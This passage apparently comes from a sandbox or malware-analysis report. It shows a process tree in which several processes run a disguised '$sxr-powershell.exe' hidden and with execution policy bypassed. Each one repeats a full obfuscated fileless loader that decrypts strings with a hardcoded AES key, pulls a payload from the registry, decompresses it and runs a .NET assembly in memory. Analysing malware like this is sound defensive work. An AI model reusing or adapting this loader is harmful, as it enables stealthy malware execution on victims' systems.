'')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        33⤵
        
        PID:6648
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3076).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        33⤵
        
        PID:8992
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8992).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        34⤵
        
        PID:10088
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8992).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        34⤵
        
        PID:3988
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3988 -s 1348
        35⤵
        
        PID:6016
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8992).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join 